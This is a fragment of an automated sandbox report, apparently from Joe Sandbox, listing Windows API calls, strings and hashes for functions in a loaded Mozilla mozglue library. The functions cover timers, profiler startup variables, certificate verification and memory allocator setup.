                                                                  • __aulldiv.LIBCMT ref: 6C5F36E4
                                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 6C5F3773
                                                                  • EnterCriticalSection.KERNEL32(6C67F688), ref: 6C5F377E
                                                                  • LeaveCriticalSection.KERNEL32(6C67F688), ref: 6C5F37BD
                                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 6C5F37C4
                                                                  • EnterCriticalSection.KERNEL32(6C67F688), ref: 6C5F37CB
                                                                  • LeaveCriticalSection.KERNEL32(6C67F688), ref: 6C5F3801
                                                                  • __aulldiv.LIBCMT ref: 6C5F3883
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6C5F3902
                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6C5F3918
                                                                  • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6C5F394C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
                                                                  • String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
                                                                  • API String ID: 301339242-3790311718
                                                                  • Opcode ID: f634040921f35b0eea2789530feb0b376285e7a234b4135b532e185e57b868d2
                                                                  • Instruction ID: ae5b6e22665f3c3b621aea985a60e67c72874dd9e28f11a251944836f67cabf9
                                                                  • Opcode Fuzzy Hash: f634040921f35b0eea2789530feb0b376285e7a234b4135b532e185e57b868d2
                                                                  • Instruction Fuzzy Hash: 79B1D571B093209FDB0DDF2AC894A5A77F5BB8A704F148D2DE499D3350D73098058FAA

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetSystemInfo.KERNEL32(?), ref: 6C60C947
                                                                  • VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6C60C969
                                                                  • GetSystemInfo.KERNEL32(?), ref: 6C60C9A9
                                                                  • VirtualFree.KERNEL32(00000000,?,00008000), ref: 6C60C9C8
                                                                  • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6C60C9E2
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: Virtual$AllocInfoSystem$Free
                                                                  • String ID:
                                                                  • API String ID: 4191843772-0
                                                                  • Opcode ID: adae4016409be28a9c7b87b0c713ea7a4c10ab72bdfc57a16b48e8af9ccfc184
                                                                  • Instruction ID: ea0ab1f602709e0d25c2043ab4b3eac6a1b32a6c44a7defb6ce004247f9a3471
                                                                  • Opcode Fuzzy Hash: adae4016409be28a9c7b87b0c713ea7a4c10ab72bdfc57a16b48e8af9ccfc184
                                                                  • Instruction Fuzzy Hash: BC21C5317416247BDB0DAA25C9C4BAE72B9AB86744F50051AF903A7A80EB6058048BBE

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • ?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6C5F3095
                                                                    • Part of subcall function 6C5F35A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6C67F688,00001000), ref: 6C5F35D5
                                                                    • Part of subcall function 6C5F35A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C5F35E0
                                                                    • Part of subcall function 6C5F35A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6C5F35FD
                                                                    • Part of subcall function 6C5F35A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C5F363F
                                                                    • Part of subcall function 6C5F35A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C5F369F
                                                                    • Part of subcall function 6C5F35A0: __aulldiv.LIBCMT ref: 6C5F36E4
                                                                  • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C5F309F
                                                                    • Part of subcall function 6C615B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C6156EE,?,00000001), ref: 6C615B85
                                                                    • Part of subcall function 6C615B50: EnterCriticalSection.KERNEL32(6C67F688,?,?,?,6C6156EE,?,00000001), ref: 6C615B90
                                                                    • Part of subcall function 6C615B50: LeaveCriticalSection.KERNEL32(6C67F688,?,?,?,6C6156EE,?,00000001), ref: 6C615BD8
                                                                    • Part of subcall function 6C615B50: GetTickCount64.KERNEL32 ref: 6C615BE4
                                                                  • ?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6C5F30BE
                                                                    • Part of subcall function 6C5F30F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6C5F3127
                                                                    • Part of subcall function 6C5F30F0: __aulldiv.LIBCMT ref: 6C5F3140
                                                                    • Part of subcall function 6C62AB2A: __onexit.LIBCMT ref: 6C62AB30
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
                                                                  • String ID:
                                                                  • API String ID: 4291168024-0
                                                                  • Opcode ID: 3e1371c1ac841b0546449f294d89ba1aa2724a09ded8fc9f2c12f6e559b30f3f
                                                                  • Instruction ID: b22d755705290fa2e715f224c7c122e7f20122a2fc477e63226915a5f0e2073d
                                                                  • Opcode Fuzzy Hash: 3e1371c1ac841b0546449f294d89ba1aa2724a09ded8fc9f2c12f6e559b30f3f
                                                                  • Instruction Fuzzy Hash: C1F04922D3075496CB15EF3588C15E6B370EFAB114F501B19E84413511FB2062D883EF

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 118 843b8c-843b97 119 843ba0-843ba3 118->119 120 843b99-843b9e 118->120 121 843baa-843bbe VirtualAlloc 119->121 122 843ba5 119->122 120->121 122->121
                                                                  APIs
                                                                  • VirtualAlloc.KERNEL32(?,?,?,?), ref: 00843BB7
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1818332466.0000000000836000.00000040.00000001.01000000.00000003.sdmp, Offset: 006EC000, based on PE: true
                                                                  • Associated: 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1818332466.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1818332466.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1818332466.00000000008C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1818332466.0000000000BE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: AllocVirtual
                                                                  • String ID:
                                                                  • API String ID: 4275171209-0
                                                                  • Opcode ID: b81c7795c4b36eb2d94e8a598d59303a933ee23801c15a40f404546f01923613
                                                                  • Instruction ID: 0ad30cb638e9d0d3ccc34b75d70033aae77dec90f453be5cf9067d612bd7b8b4
                                                                  • Opcode Fuzzy Hash: b81c7795c4b36eb2d94e8a598d59303a933ee23801c15a40f404546f01923613
                                                                  • Instruction Fuzzy Hash: 0BE0E2B630060CABDB10DE8CD884FAB33ADFB88320F148011FA09D7204C274EE509761
                                                                  APIs
                                                                    • Part of subcall function 6C62AB89: EnterCriticalSection.KERNEL32(6C67E370,?,?,?,6C5F34DE,6C67F6CC,?,?,?,?,?,?,?,6C5F3284), ref: 6C62AB94
                                                                    • Part of subcall function 6C62AB89: LeaveCriticalSection.KERNEL32(6C67E370,?,6C5F34DE,6C67F6CC,?,?,?,?,?,?,?,6C5F3284,?,?,6C6156F6), ref: 6C62ABD1
                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING), ref: 6C605492
                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C6054A8
                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C6054BE
                                                                  • __Init_thread_footer.LIBCMT ref: 6C6054DB
                                                                    • Part of subcall function 6C62AB3F: EnterCriticalSection.KERNEL32(6C67E370,?,?,6C5F3527,6C67F6CC,?,?,?,?,?,?,?,?,6C5F3284), ref: 6C62AB49
                                                                    • Part of subcall function 6C62AB3F: LeaveCriticalSection.KERNEL32(6C67E370,?,6C5F3527,6C67F6CC,?,?,?,?,?,?,?,?,6C5F3284,?,?,6C6156F6), ref: 6C62AB7C
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C6054F9
                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_HELP), ref: 6C605516
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C60556A
                                                                  • AcquireSRWLockExclusive.KERNEL32(6C67F4B8), ref: 6C605577
                                                                  • moz_xmalloc.MOZGLUE(00000070), ref: 6C605585
                                                                  • ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(00000000,00000001), ref: 6C605590
                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP), ref: 6C6055E6
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C67F4B8), ref: 6C605606
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C605616
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C60563E
                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C605646
                                                                    • Part of subcall function 6C6394D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C6394EE
                                                                    • Part of subcall function 6C6394D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,?,00000000,?), ref: 6C639508
                                                                  Strings
                                                                  • [I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES_BITFIELD = %d, xrefs: 6C605AC9
                                                                  • [I %d/%d] profiler_init, xrefs: 6C60564E
                                                                  • GeckoMain, xrefs: 6C605554, 6C6055D5
                                                                  • [I %d/%d] -> This process is excluded and won't be profiled, xrefs: 6C605BBE
                                                                  • MOZ_PROFILER_STARTUP_DURATION, xrefs: 6C605749
                                                                  • [I %d/%d] - MOZ_PROFILER_STARTUP is set, xrefs: 6C605717
                                                                  • [I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES = %d, xrefs: 6C60584E
                                                                  • MOZ_PROFILER_STARTUP_FEATURES, xrefs: 6C6057AE
                                                                  • MOZ_PROFILER_STARTUP_FEATURES_BITFIELD, xrefs: 6C605791
                                                                  • [I %d/%d] - MOZ_PROFILER_STARTUP_ENTRIES = %u, xrefs: 6C605C56
                                                                  • - MOZ_PROFILER_STARTUP_ENTRIES unit must be one of the following: KB, KiB, MB, MiB, GB, GiB, xrefs: 6C605D2B
                                                                  • MOZ_BASE_PROFILER_HELP, xrefs: 6C605511
                                                                  • - MOZ_PROFILER_STARTUP_DURATION not a valid float: %s, xrefs: 6C605CF9
                                                                  • - MOZ_PROFILER_STARTUP_ENTRIES not a valid integer: %s, xrefs: 6C605D24
                                                                  • MOZ_BASE_PROFILER_LOGGING, xrefs: 6C6054B9
                                                                  • MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C60548D
                                                                  • MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C6054A3
                                                                  • MOZ_PROFILER_STARTUP, xrefs: 6C6055E1
                                                                  • - MOZ_PROFILER_STARTUP_INTERVAL not a valid float: %s, xrefs: 6C605D01
                                                                  • - MOZ_PROFILER_STARTUP_FEATURES_BITFIELD not a valid integer: %s, xrefs: 6C605D1C
                                                                  • MOZ_PROFILER_STARTUP_ENTRIES, xrefs: 6C605724
                                                                  • MOZ_PROFILER_STARTUP_INTERVAL, xrefs: 6C605766
                                                                  • MOZ_PROFILER_STARTUP_NO_BASE, xrefs: 6C6056E3
                                                                  • MOZ_PROFILER_STARTUP_FILTERS, xrefs: 6C6057C5
                                                                  • [I %d/%d] - MOZ_PROFILER_STARTUP_FILTERS = %s, xrefs: 6C605B38
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: getenv$CriticalSection$CurrentThread$EnterExclusiveLeaveLock$AcquireCreation@Init_thread_footerProcessReleaseStamp@mozilla@@TimeV12@__acrt_iob_func__stdio_common_vfprintf_getpidfreemoz_xmalloc
                                                                  • String ID: - MOZ_PROFILER_STARTUP_DURATION not a valid float: %s$- MOZ_PROFILER_STARTUP_ENTRIES not a valid integer: %s$- MOZ_PROFILER_STARTUP_ENTRIES unit must be one of the following: KB, KiB, MB, MiB, GB, GiB$- MOZ_PROFILER_STARTUP_FEATURES_BITFIELD not a valid integer: %s$- MOZ_PROFILER_STARTUP_INTERVAL not a valid float: %s$GeckoMain$MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_HELP$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING$MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_DURATION$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL$MOZ_PROFILER_STARTUP_NO_BASE$[I %d/%d] -> This process is excluded and won't be profiled$[I %d/%d] - MOZ_PROFILER_STARTUP is set$[I %d/%d] - MOZ_PROFILER_STARTUP_ENTRIES = %u$[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES = %d$[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES_BITFIELD = %d$[I %d/%d] - MOZ_PROFILER_STARTUP_FILTERS = %s$[I %d/%d] profiler_init
                                                                  • API String ID: 1000357164-1266492768
                                                                  • Opcode ID: 9c11f1e9aa4da54aa4b6719c4ec568a404fcaf0cf5507455c51fd1a00f93563c
                                                                  • Instruction ID: 25002c8e6bab9c8ebef5900c22b72c78bdee71452a14603bef8b910cf271865d
                                                                  • Opcode Fuzzy Hash: 9c11f1e9aa4da54aa4b6719c4ec568a404fcaf0cf5507455c51fd1a00f93563c
                                                                  • Instruction Fuzzy Hash: B3220570A043109BEB099F65895875A77B4AF8734CF140D2AE94AA7B41EB35C444CF6F
                                                                  APIs
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C63B845
                                                                  • AcquireSRWLockExclusive.KERNEL32(6C67F4B8), ref: 6C63B852
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C67F4B8), ref: 6C63B884
                                                                  • InitializeConditionVariable.KERNEL32(?), ref: 6C63B8D2
                                                                  • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?), ref: 6C63B9FD
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C63BA05
                                                                  • AcquireSRWLockExclusive.KERNEL32(6C67F4B8), ref: 6C63BA12
                                                                  • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C63BA27
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C67F4B8), ref: 6C63BA4B
                                                                  • free.MOZGLUE(?), ref: 6C63C9C7
                                                                  • free.MOZGLUE(?), ref: 6C63C9DC
                                                                  Strings
                                                                  • [I %d/%d] Stack sample too big for profiler storage, needed %u bytes, xrefs: 6C63C878
                                                                  • [I %d/%d] Stack sample too big for local storage, needed %u bytes, xrefs: 6C63C7DA
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: ExclusiveLock$AcquireCurrentNow@ReleaseStamp@mozilla@@ThreadTimeV12@_free$ConditionInitializeVariable
                                                                  • String ID: [I %d/%d] Stack sample too big for local storage, needed %u bytes$[I %d/%d] Stack sample too big for profiler storage, needed %u bytes
                                                                  • API String ID: 656605770-2789026554
                                                                  • Opcode ID: 5250d44739d19cdf35a7fbce3ef57e5f31e7fa869afeb79d693bb8d830e9291d
                                                                  • Instruction ID: 48600ae2d90f23a6a40ddbc54ab03e2511dea3655df97523b1216bee6b10e1aa
                                                                  • Opcode Fuzzy Hash: 5250d44739d19cdf35a7fbce3ef57e5f31e7fa869afeb79d693bb8d830e9291d
                                                                  • Instruction Fuzzy Hash: E1A2CC71A083908FC725CF29C480B9BB7E5BFCA314F105A2DE89D97751DB709909CB9A
                                                                  APIs
                                                                  • CryptQueryObject.CRYPT32(00000001,?,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C606CCC
                                                                  • CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C606D11
                                                                  • moz_xmalloc.MOZGLUE(0000000C), ref: 6C606D26
                                                                    • Part of subcall function 6C60CA10: malloc.MOZGLUE(?), ref: 6C60CA26
                                                                  • memset.VCRUNTIME140(00000000,00000000,0000000C), ref: 6C606D35
                                                                  • CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C606D53
                                                                  • CertFindCertificateInStore.CRYPT32(00000000,00010001,00000000,000B0000,00000000,00000000), ref: 6C606D73
                                                                  • free.MOZGLUE(00000000), ref: 6C606D80
                                                                  • CertGetNameStringW.CRYPT32 ref: 6C606DC0
                                                                  • moz_xmalloc.MOZGLUE(00000000), ref: 6C606DDC
                                                                  • memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C606DEB
                                                                  • CertGetNameStringW.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 6C606DFF
                                                                  • CertFreeCertificateContext.CRYPT32(00000000), ref: 6C606E10
                                                                  • CryptMsgClose.CRYPT32(00000000), ref: 6C606E27
                                                                  • CertCloseStore.CRYPT32(00000000,00000000), ref: 6C606E34
                                                                  • CreateFileW.KERNEL32 ref: 6C606EF9
                                                                  • moz_xmalloc.MOZGLUE(00000000), ref: 6C606F7D
                                                                  • memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C606F8C
                                                                  • memset.VCRUNTIME140(00000002,00000000,00000208), ref: 6C60709D
                                                                  • CryptQueryObject.CRYPT32(00000001,00000002,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C607103
                                                                  • free.MOZGLUE(00000000), ref: 6C607153
                                                                  • CloseHandle.KERNEL32(?), ref: 6C607176
                                                                  • __Init_thread_footer.LIBCMT ref: 6C607209
                                                                  • __Init_thread_footer.LIBCMT ref: 6C60723A
                                                                  • __Init_thread_footer.LIBCMT ref: 6C60726B
                                                                  • __Init_thread_footer.LIBCMT ref: 6C60729C
                                                                  • __Init_thread_footer.LIBCMT ref: 6C6072DC
                                                                  • __Init_thread_footer.LIBCMT ref: 6C60730D
                                                                  • memset.VCRUNTIME140(?,00000000,00000110), ref: 6C6073C2
                                                                  • VerSetConditionMask.NTDLL ref: 6C6073F3
                                                                  • VerSetConditionMask.NTDLL ref: 6C6073FF
                                                                  • VerSetConditionMask.NTDLL ref: 6C607406
                                                                  • VerSetConditionMask.NTDLL ref: 6C60740D
                                                                  • VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C60741A
                                                                  • moz_xmalloc.MOZGLUE(?), ref: 6C60755A
                                                                  • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C607568
                                                                  • CryptBinaryToStringW.CRYPT32(00000000,00000000,4000000C,00000000,?), ref: 6C607585
                                                                  • _wcsupr_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C607598
                                                                  • free.MOZGLUE(00000000), ref: 6C6075AC
                                                                    • Part of subcall function 6C62AB89: EnterCriticalSection.KERNEL32(6C67E370,?,?,?,6C5F34DE,6C67F6CC,?,?,?,?,?,?,?,6C5F3284), ref: 6C62AB94
                                                                    • Part of subcall function 6C62AB89: LeaveCriticalSection.KERNEL32(6C67E370,?,6C5F34DE,6C67F6CC,?,?,?,?,?,?,?,6C5F3284,?,?,6C6156F6), ref: 6C62ABD1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: CryptInit_thread_footermemset$Cert$ConditionMaskmoz_xmalloc$CloseStringfree$CertificateCriticalNameObjectParamQuerySectionStore$BinaryContextCreateEnterFileFindFreeHandleInfoLeaveVerifyVersion_wcsupr_smalloc
                                                                  • String ID: ($CryptCATAdminReleaseCatalogContext$SHA256$wintrust.dll
                                                                  • API String ID: 3256780453-3980470659
                                                                  • Opcode ID: 265510603915c629c3714f96b877014bc538e9e85bf646c149d0b142250c3f70
                                                                  • Instruction ID: d6605cef8a7cc05a270b64ca4bd92ce6de61b48ed3cfd16da25138cbaee4d07f
                                                                  • Opcode Fuzzy Hash: 265510603915c629c3714f96b877014bc538e9e85bf646c149d0b142250c3f70
                                                                  • Instruction Fuzzy Hash: 9852E7B1A042149FEB26CF25CD84FEA77B8EF46304F104599E909A7640DB70AF84CF69
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(6C67E7DC), ref: 6C627019
                                                                  • LeaveCriticalSection.KERNEL32(6C67E7DC), ref: 6C627061
                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C6271A4
                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 6C62721D
                                                                  • memcpy.VCRUNTIME140(?,?,?), ref: 6C62723E
                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C62726C
                                                                  • memset.VCRUNTIME140(?,000000E5,000000FF), ref: 6C6272B2
                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 6C62733F
                                                                  • EnterCriticalSection.KERNEL32(0000000C), ref: 6C6273E8
                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 6C62961C
                                                                  • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C629622
                                                                  • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C629642
                                                                  • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C62964F
                                                                  • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C6296CE
                                                                  • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C6296DB
                                                                  • AcquireSRWLockExclusive.KERNEL32(6C67E804), ref: 6C629747
                                                                  • GetSystemInfo.KERNEL32(?), ref: 6C629792
                                                                  • __Init_thread_footer.LIBCMT ref: 6C6297A5
                                                                  • GetEnvironmentVariableA.KERNEL32(MALLOC_OPTIONS,6C67E810,00000040), ref: 6C6297CF
                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(6C67E7B8,00001388), ref: 6C629838
                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(6C67E744,00001388), ref: 6C62984E
                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(6C67E784,00001388), ref: 6C629874
                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(6C67E7DC,00001388), ref: 6C629895
                                                                  Strings
                                                                  • MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?), xrefs: 6C6299D2
                                                                  • MALLOC_OPTIONS, xrefs: 6C6297CA
                                                                  • MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.), xrefs: 6C6299A8
                                                                  • : (malloc) Unsupported character in malloc options: ', xrefs: 6C629BF4
                                                                  • MOZ_RELEASE_ASSERT(!aArena || arena == aArena), xrefs: 6C629993
                                                                  • MOZ_RELEASE_ASSERT(mNode), xrefs: 6C629933, 6C629A33, 6C629A4E
                                                                  • MOZ_CRASH(), xrefs: 6C629B42
                                                                  • MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?), xrefs: 6C6299BD
                                                                  • Compile-time page size does not divide the runtime one., xrefs: 6C629B38
                                                                  • <jemalloc>, xrefs: 6C629B33, 6C629BE3
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$CountEnterInitializeK@1@LeaveMaybe@_RandomSpinUint64@mozilla@@$AcquireEnvironmentExclusiveInfoInit_thread_footerLockSystemVariable_errnomemcpymemset
